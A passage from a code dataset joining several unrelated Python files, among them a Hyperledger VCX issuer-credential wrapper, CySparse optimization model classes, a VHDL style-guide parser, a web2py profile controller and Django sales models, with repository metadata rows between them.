use `vcx_issuer_credential_update_state` or `vcx_issuer_credential_update_state_with_message` functions for state updates.
VcxStateType::VcxStateAccepted - once `vcx_issuer_send_credential` (send `Credential` message) is called.
# Transitions
proprietary:
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CRED_REQ` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateRequestReceived - `vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
aries: RFC - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential
VcxStateType::None - `vcx_issuer_create_credential` - VcxStateType::VcxStateInitialized
VcxStateType::VcxStateInitialized - `vcx_issuer_send_credential_offer` - VcxStateType::VcxStateOfferSent
VcxStateType::VcxStateOfferSent - received `CredentialRequest` - VcxStateType::VcxStateRequestReceived
VcxStateType::VcxStateOfferSent - received `ProblemReport` - VcxStateType::None
VcxStateType::VcxStateRequestReceived - vcx_issuer_send_credential` - VcxStateType::VcxStateAccepted
VcxStateType::VcxStateAccepted - received `Ack` - VcxStateType::VcxStateAccepted
# Messages
proprietary:
CredentialOffer (`CRED_OFFER`)
CredentialRequest (`CRED_REQ`)
Credential (`CRED`)
aries:
CredentialProposal - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#propose-credential
CredentialOffer - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#offer-credential
CredentialRequest - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#request-credential
Credential - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0036-issue-credential#issue-credential
ProblemReport - https://github.com/hyperledger/aries-rfcs/tree/7b6b93acbaf9611d3c892c4bada142fe2613de6e/features/0035-report-problem#the-problem-report-message-type
Ack - https://github.com/hyperledger/aries-rfcs/tree/master/features/0015-acks#explicit-acks
"""
def __init__(self, source_id: str, attrs: dict, cred_def_id: str, name: str, price: float):
VcxStateful.__init__(self, source_id)
self._cred_def_id = cred_def_id
self._attrs = attrs
self._name = name
self._price = price
def __del__(self):
self.release()
self.logger.debug("Deleted {} obj: {}".format(IssuerCredential, self.handle))
@staticmethod
async def create(source_id: str, attrs: dict, cred_def_handle: int, name: str, price: str):
"""
Create a Issuer Credential object that provides a credential for an enterprise's user
Assumes a credential definition has been already written to the ledger.
:param source_id: Tag associated by user of sdk
:param attrs: attributes that will form the credential
:param cred_def_handle: Handle from previously created credential def object
:param name: Name given to the Credential
:param price: Price, in tokens, required as payment for the issuance of the credential.
Example:
source_id = '1'
cred_def_handle = 1
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_handle, name, price)
"""
constructor_params = (source_id, attrs, cred_def_handle, name, price)
c_source_id = c_char_p(source_id.encode('utf-8'))
c_cred_def_handle = c_uint32(cred_def_handle)
c_price = c_char_p(price.encode('utf-8'))
# default institution_did in config is used as issuer_did
c_issuer_did = None
c_data = c_char_p(json.dumps(attrs).encode('utf-8'))
c_name = c_char_p(name.encode('utf-8'))
c_params = (c_source_id, c_cred_def_handle, c_issuer_did, c_data, c_name, c_price)
return await IssuerCredential._create("vcx_issuer_create_credential",
constructor_params,
c_params)
@staticmethod
async def deserialize(data: dict):
"""
Create a IssuerCredential object from a previously serialized object
:param data: dict representing a serialized IssuerCredential Object
:return: IssuerCredential object
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
issuer_credential2 = await IssuerCredential.deserialize(data)
"""
issuer_credential = await IssuerCredential._deserialize("vcx_issuer_credential_deserialize",
json.dumps(data),
data.get('data').get('source_id'),
data.get('data').get('price'),
data.get('data').get('credential_attributes'),
data.get('data').get('schema_seq_no'),
data.get('data').get('credential_request'))
return issuer_credential
async def serialize(self) -> dict:
"""
Serializes the issuer credential object for storage and later deserialization.
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
data = await issuer_credential.serialize()
:return: dictionary representing the serialized object
"""
return await self._serialize(IssuerCredential, 'vcx_issuer_credential_serialize')
async def update_state(self) -> int:
"""
Query the agency for the received messages.
Checks for any messages changing state in the object and updates the state attribute.
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
        :return: Current state of the IssuerCredential
"""
return await self._update_state(IssuerCredential, 'vcx_issuer_credential_update_state')
async def update_state_with_message(self, message: str) -> int:
"""
Update the state of the credential based on the given message.
Example:
cred = await IssuerCredential.create(source_id)
assert await cred.update_state_with_message(message) == State.Accepted
:param message: message to process for state changes
:return Current state of the IssuerCredential
"""
return await self._update_state_with_message(IssuerCredential, message, 'vcx_issuer_credential_update_state_with_message')
async def get_state(self) -> int:
"""
Get the current state of the issuer credential object
Example:
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
issuer_credential.update_state()
:return: State of the Object. Possible states:
1 - Initialized
2 - Offer Sent
3 - Request Received
4 - Issued
"""
return await self._get_state(IssuerCredential, 'vcx_issuer_credential_get_state')
def release(self) -> None:
"""
Used to release memory associated with this object, used by the c library.
:return:
"""
self._release(IssuerCredential, 'vcx_issuer_credential_release')
async def send_offer(self, connection: Connection):
"""
Send a credential offer to a holder showing what will be included in the actual credential
:param connection: Connection that identifies pairwise connection
:return: None
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
issuer_credential.send_offer(connection)
"""
if not hasattr(IssuerCredential.send_offer, "cb"):
self.logger.debug("vcx_issuer_send_credential_offer: Creating callback")
IssuerCredential.send_offer.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
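        # the ctypes callback is cached on the method object so it is created
        # once and stays referenced for the lifetime of the process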
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential_offer',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_offer.cb)
async def get_offer_msg(self):
"""
        Gets the credential offer message that can be sent to a connection
        :return: credential offer message as JSON
Example:
source_id = '1'
cred_def_id = 'cred_def_id1'
attrs = {'key': 'value', 'key2': 'value2', 'key3': 'value3'}
name = 'Credential Name'
issuer_did = '8XFh8yBzrpJQmNyZzgoTqB'
phone_number = '8019119191'
price = 1
issuer_credential = await IssuerCredential.create(source_id, attrs, cred_def_id, name, price)
connection = await Connection.create(source_id)
            msg = await issuer_credential.get_offer_msg()
"""
if not hasattr(IssuerCredential.get_offer_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_offer_msg: Creating callback")
IssuerCredential.get_offer_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
msg = await do_call('vcx_issuer_get_credential_offer_msg',
c_credential_handle,
IssuerCredential.get_offer_msg.cb)
return json.loads(msg.decode())
async def send_credential(self, connection: Connection):
"""
Sends the credential to the end user (holder).
:param connection: Connection that identifies pairwise connection
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.send_credential, "cb"):
self.logger.debug("vcx_issuer_send_credential: Creating callback")
IssuerCredential.send_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
c_connection_handle = c_uint32(connection.handle)
await do_call('vcx_issuer_send_credential',
c_credential_handle,
c_connection_handle,
IssuerCredential.send_credential.cb)
async def get_credential_msg(self, my_pw_did: str):
"""
Get the credential to send to the end user (prover).
:param my_pw_did: my pw did associated with person I'm sending credential to
:return: None
Example:
credential.send_credential(connection)
"""
if not hasattr(IssuerCredential.get_credential_msg, "cb"):
self.logger.debug("vcx_issuer_get_credential_msg: Creating callback")
IssuerCredential.get_credential_msg.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
c_my_pw_did = c_char_p(json.dumps(my_pw_did).encode('utf-8'))
msg = await do_call('vcx_issuer_get_credential_msg',
c_credential_handle,
c_my_pw_did,
IssuerCredential.get_credential_msg.cb)
return json.loads(msg.decode())
async def revoke_credential(self):
"""
Revokes a credential.
:return: None
Example:
credential.revoke_credential()
"""
if not hasattr(IssuerCredential.revoke_credential, "cb"):
self.logger.debug("vcx_issuer_revoke_credential: Creating callback")
IssuerCredential.revoke_credential.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32))
c_credential_handle = c_uint32(self.handle)
await do_call('vcx_issuer_revoke_credential',
c_credential_handle,
IssuerCredential.revoke_credential.cb)
async def get_payment_txn(self):
"""
Retrieve the payment transaction associated with this credential. This can be used to get the txn that
was used to pay the issuer from the prover. This could be considered a receipt of payment from the payer to
the issuer.
Example:
txn = credential.get_payment_txn()
:return: payment transaction
{
"amount":25,
"inputs":[
"pay:null:1_3FvPC7dzFbQKzfG",
"pay:null:1_lWVGKc07Pyc40m6"
],
"outputs":[
{"recipient":"pay:null:FrSVC3IrirScyRh","amount":5,"extra":null},
{"recipient":"pov:null:OsdjtGKavZDBuG2xFw2QunVwwGs5IB3j","amount":25,"extra":null}
]
}
"""
if not hasattr(IssuerCredential.get_payment_txn, "cb"):
self.logger.debug("vcx_issuer_credential_get_payment_txn: Creating callback")
IssuerCredential.get_payment_txn.cb = create_cb(CFUNCTYPE(None, c_uint32, c_uint32, c_char_p))
c_credential_handle = c_uint32(self.handle)
payment_txn = await do_call('vcx_issuer_credential_get_payment_txn',
c_credential_handle,
IssuerCredential.get_payment_txn.cb)
return json.loads(payment_txn.decode())
| apache-2.0 | -1,800,778,143,822,007,800 | 45.667575 | 172 | 0.624803 | false |
PythonOptimizers/NLP.py | nlp/model/cysparsemodel.py | 1 | 5725 | try:
from cysparse.sparse.ll_mat import LLSparseMatrix
import cysparse.common_types.cysparse_types as types
except ImportError:
print "CySparse is not installed!"
from nlp.model.nlpmodel import NLPModel
from nlp.model.snlp import SlackModel
from nlp.model.qnmodel import QuasiNewtonModel
from pykrylov.linop import CysparseLinearOperator
import numpy as np
class CySparseNLPModel(NLPModel):
"""
An `NLPModel` where sparse matrices are returned as CySparse matrices.
The `NLPModel`'s `jac` and `hess` methods should return sparse
Jacobian and Hessian in coordinate format: (vals, rows, cols).
"""
def hess(self, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z).
Note that `rows`, `cols` and `vals` must represent a LOWER triangular
sparse matrix in the coordinate format (COO).
"""
vals, rows, cols = super(CySparseNLPModel, self).hess(*args, **kwargs)
H = LLSparseMatrix(size=self.nvar, size_hint=vals.size,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H.put_triplet(rows, cols, vals)
return H
def jac(self, *args, **kwargs):
"""Evaluate constraints Jacobian at x."""
vals, rows, cols = super(CySparseNLPModel, self).jac(*args, **kwargs)
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
itype=types.INT64_T, dtype=types.FLOAT64_T)
J.put_triplet(rows, cols, vals)
return J
try:
from nlp.model.amplmodel import AmplModel
class CySparseAmplModel(CySparseNLPModel, AmplModel):
# MRO: 1. CySparseAmplModel
# 2. CySparseNLPModel
# 3. AmplModel
# 4. NLPModel
#
# Here, `jac` and `hess` are inherited directly from CySparseNPLModel.
#
def A(self, *args, **kwargs):
"""
Evaluate sparse Jacobian of the linear part of the
constraints. Useful to obtain constraint matrix
when problem is a linear programming problem.
"""
vals, rows, cols = super(CySparseAmplModel, self).A(*args, **kwargs)
A = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar,
size_hint=vals.size, store_symmetric=False,
                               itype=types.INT64_T, dtype=types.FLOAT64_T)
A.put_triplet(rows, cols, vals)
return A
def jop(self, *args, **kwargs):
"""Obtain Jacobian at x as a linear operator."""
return CysparseLinearOperator(self.jac(*args, **kwargs))
except ImportError:
pass
class CySparseSlackModel(SlackModel):
"""
Reformulate an optimization problem using slack variables.
New model represents matrices as `CySparse` matrices.
:parameters:
:model: Original model to be transformed into a slack form.
"""
def __init__(self, model, **kwargs):
if not isinstance(model, CySparseNLPModel):
msg = "The model in `model` should be a CySparseNLPModel"
msg += " or a derived class of it."
raise TypeError(msg)
super(CySparseSlackModel, self).__init__(model)
def _jac(self, x, lp=False):
"""Helper method to assemble the Jacobian matrix.
See the documentation of :meth:`jac` for more information.
The positional argument `lp` should be set to `True` only if the
problem is known to be a linear program. In this case, the evaluation
of the constraint matrix is cheaper and the argument `x` is ignored.
"""
m = self.m
model = self.model
on = self.original_n
lowerC = np.array(model.lowerC, dtype=np.int64)
nlowerC = model.nlowerC
upperC = np.array(model.upperC, dtype=np.int64)
nupperC = model.nupperC
rangeC = np.array(model.rangeC, dtype=np.int64)
nrangeC = model.nrangeC
# Initialize sparse Jacobian
nnzJ = self.model.nnzj + m
J = LLSparseMatrix(nrow=self.ncon, ncol=self.nvar, size_hint=nnzJ,
store_symmetric=False, itype=types.INT64_T,
dtype=types.FLOAT64_T)
# Insert contribution of general constraints
if lp:
J[:on, :on] = self.model.A()
else:
J[:on, :on] = self.model.jac(x[:on])
# Create a few index lists
rlowerC = np.array(range(nlowerC), dtype=np.int64)
rupperC = np.array(range(nupperC), dtype=np.int64)
rrangeC = np.array(range(nrangeC), dtype=np.int64)
# Insert contribution of slacks on general constraints
J.put_triplet(lowerC, on + rlowerC,
-1.0 * np.ones(nlowerC, dtype=np.float64))
J.put_triplet(upperC, on + nlowerC + rupperC,
-1.0 * np.ones(nupperC, dtype=np.float64))
J.put_triplet(rangeC, on + nlowerC + nupperC + rrangeC,
-1.0 * np.ones(nrangeC, dtype=np.float64))
return J
def hess(self, x, z=None, *args, **kwargs):
"""Evaluate Lagrangian Hessian at (x, z)."""
model = self.model
if isinstance(model, QuasiNewtonModel):
return self.hop(x, z, *args, **kwargs)
if z is None:
z = np.zeros(self.m)
on = model.n
H = LLSparseMatrix(size=self.nvar, size_hint=self.model.nnzh,
store_symmetric=True, itype=types.INT64_T,
dtype=types.FLOAT64_T)
H[:on, :on] = self.model.hess(x[:on], z, *args, **kwargs)
return H
| lgpl-3.0 | -1,697,829,370,414,543,000 | 35.464968 | 80 | 0.591441 | false |
jeremiah-c-leary/vhdl-style-guide | vsg/vhdlFile/classify/association_element.py | 1 | 1756 |
from vsg.token import association_element as token
from vsg.vhdlFile import utils
def detect(iCurrent, lObjects):
'''
association_element ::=
[ formal_part => ] actual_part
    An association element will either end in a close parenthesis or a comma that is not within parentheses.
    association_element [)|,]
'''
iOpenParenthesis = 0
iCloseParenthesis = 0
iToken = iCurrent
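    # walk tokens while tracking parenthesis depth; the element ends at a
    # comma at the current depth or at a closing parenthesis one level up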
while not utils.token_is_semicolon(iToken, lObjects):
iToken = utils.find_next_token(iToken, lObjects)
if utils.token_is_open_parenthesis(iToken, lObjects):
iOpenParenthesis += 1
if utils.token_is_close_parenthesis(iToken, lObjects):
iCloseParenthesis += 1
if iCloseParenthesis == iOpenParenthesis + 1:
classify(iCurrent, iToken, lObjects, ')')
return iToken
if iCloseParenthesis == iOpenParenthesis:
if utils.token_is_comma(iToken, lObjects):
classify(iCurrent, iToken, lObjects, ',')
return iToken
iToken += 1
return iToken
def classify(iStart, iEnd, lObjects, sEnd):
iCurrent = iStart
# Classify formal part if it exists
if utils.find_in_index_range('=>', iStart, iEnd, lObjects):
iCurrent = utils.assign_tokens_until('=>', token.formal_part, iCurrent, lObjects)
iCurrent = utils.assign_next_token_required('=>', token.assignment, iCurrent, lObjects)
# Classify actual part
for iCurrent in range(iCurrent, iEnd):
if utils.is_item(lObjects, iCurrent):
utils.assign_token(lObjects, iCurrent, token.actual_part)
return iCurrent
| gpl-3.0 | -9,160,156,864,442,821,000 | 32.769231 | 108 | 0.646355 | false |
sivareddyg/UDepLambda | scripts/graphquestions/dump_to_database.py | 1 | 1094 | import sys
import json
import random
import sqlite3
items = []
for line in sys.stdin:
sent = json.loads(line)
items.append((sent['id'], sent['sentence']))
random.seed(1)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
random.shuffle(items)
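# fixed seed plus repeated shuffles keeps the presentation order
# pseudo-random but reproducible across runs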
conn = sqlite3.connect('working/annotations.db')
c = conn.cursor()
# Create table
c.execute('''CREATE TABLE annotators
(email text PRIMARY KEY NOT NULL, name text, salary real DEFAULT 0.0)''')
c.execute('''CREATE TABLE sentences
(sentid INTEGER PRIMARY KEY, qid INTEGER, sentence text NOT NULL, translated integer DEFAULT 0, translation text, startstamp INTEGER DEFAULT 0, endstamp INTEGER, annotator text)''')
for item in items:
# Insert a row of data
value = {}
value['qid'] = item[0]
value['sentence'] = item[1]
c.execute("INSERT INTO sentences (qid,sentence) VALUES (:qid,:sentence);", value)
# Save (commit) the changes
conn.commit()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
| apache-2.0 | 8,913,069,452,210,691,000 | 27.051282 | 194 | 0.71298 | false |
trosa/forca | applications/ForCA/controllers/profile.py | 1 | 2821 | from operator import itemgetter
@auth.requires_login()
def home():
if auth.has_membership('Professor') and not request.vars:
prof_id = get_prof_id()
redirect(URL(request.application, 'prof', 'home', vars=dict(prof_id=prof_id)))
else:
if request.vars:
aluno_id = request.vars['aluno_id']
else:
aluno_id = get_aluno_id()
request.vars['aluno_id'] = aluno_id
        #Check whether the person viewing the page is the student himself or an outside visitor
if int(aluno_id) == get_aluno_id():
perfil_proprio = True
else:
perfil_proprio = False
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
aluno = db(db.alunos.id==aluno_id).select(db.alunos.ALL).first()
avaliacoes = db(db.avaliacoes.aluno_id==aluno_id)
        #Gather statistics about the student's set of evaluations
evals_stats = get_evals_info(avaliacoes)
        #List of the student's most recent evaluations
raw_evals = avaliacoes.select(orderby=~db.avaliacoes.timestamp_eval, limitby=(0,3))
evals = refine_evals(raw_evals)
        #List of the student's most recent evaluations that have been answered
avaliacoes_resp = avaliacoes(Avaliacoes.timestamp_reply!=None)
raw_evals = avaliacoes_resp.select(orderby=~Avaliacoes.timestamp_reply, limitby=(0,3))
evals_replyed = refine_evals(raw_evals)
        #List of the currently logged-in user's favorite evaluations
if perfil_proprio:
#raw_favoritos = db((db.favoritos.user_id==session.auth.user.id)&(db.avaliacoes.id==db.favoritos.avaliacao_id)).select(db.avaliacoes.ALL)
#evals_favorited = refine_evals(raw_favoritos)
evals_favorited = get_favorite_evals(session.auth.user.id)
else:
evals_favorited = []
return dict(aluno=aluno, perfil_proprio=perfil_proprio, user_evals = avaliacoes, evals=evals, evals_replyed=evals_replyed,\
evals_favorited=evals_favorited, evals_stats=evals_stats, page=page, per_page=10)
@auth.requires_membership('Aluno')
def favorites():
if len(request.args):
page = int(request.args[0])
else:
page = 0
limitby = (page*10, (page+1)*11)
# if 'aluno_id' in request.vars:
# user_id = get_aluno_user_id(request.vars['aluno_id'])
# else:
user_id = session.auth.user.id
#favorite_evals = db((Favoritos.user_id==user_id)&(Avaliacoes.id==Favoritos.avaliacao_id)).select(Avaliacoes.ALL, limitby=limitby)
refined_favorites = get_favorite_evals(user_id)
return dict(evals=refined_favorites, page=page, per_page=10)
| gpl-2.0 | 2,363,282,468,083,769,000 | 39.085714 | 149 | 0.618674 | false |
alejo8591/maker | sales/models.py | 1 | 18836 | # encoding: utf-8
# Copyright 2013 maker
# License
"""
Sales module objects.
"""
from django.db import models
from maker.core.models import Object, User, ModuleSetting
from maker.identities.models import Contact
from maker.finance.models import Transaction, Currency, Tax
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from time import time as ttime
from decimal import *
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length = 512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank = True, null = True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
name = models.CharField(max_length = 512)
product_type = models.CharField(max_length=32,
default='good',
choices=(('service', 'Service'), ('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'), ))
parent = models.ForeignKey('self', blank=True, null=True, related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True, choices=(('inactive',
'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'), ))
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length = 512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
contact = models.ForeignKey(Contact)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=(('email', 'E-Mail'), ('phone', 'Phone'),
('post', 'Post'), ('face', 'Face to Face') ))
assigned = models.ManyToManyField(User, related_name = 'sales_lead_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(User, related_name = 'sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(User, related_name = 'sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't have to be unique)
next_ref = SaleOrder.objects.all().aggregate(models.Max('id'))['id__max']+1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime()*10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
#TODO: Compound taxes
taxes = {}
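        # aggregate the tax amount per tax id across all non-trashed order lines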
ops = self.orderedproduct_set.filter(trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount']+=(item_total * (p.tax.rate/100)).quantize(Decimal('.01'), rounding = ROUND_UP)
else:
taxes[p.tax.id] = {'name':p.tax.name, 'rate':p.tax.rate,
'amount':(item_total * (p.tax.rate/100))
.quantize(Decimal('.01'), rounding = ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32,
choices=(('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly','Quarterly'),
('yearly', 'Yearly')),
default='month')
cycle_end = models.DateField(blank = True, null = True)
active = models.BooleanField(default=False)
details = models.CharField(max_length = 512, blank = True, null = True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
        #step back one full billing period from the cycle end to get the cycle start
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'quarterly':
            p = relativedelta(months=+3)  # a quarter is three months
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'quarterly':
            p = relativedelta(months=+3)  # a quarter is three months
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'default_order_status')[0]
            new_invoice.status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
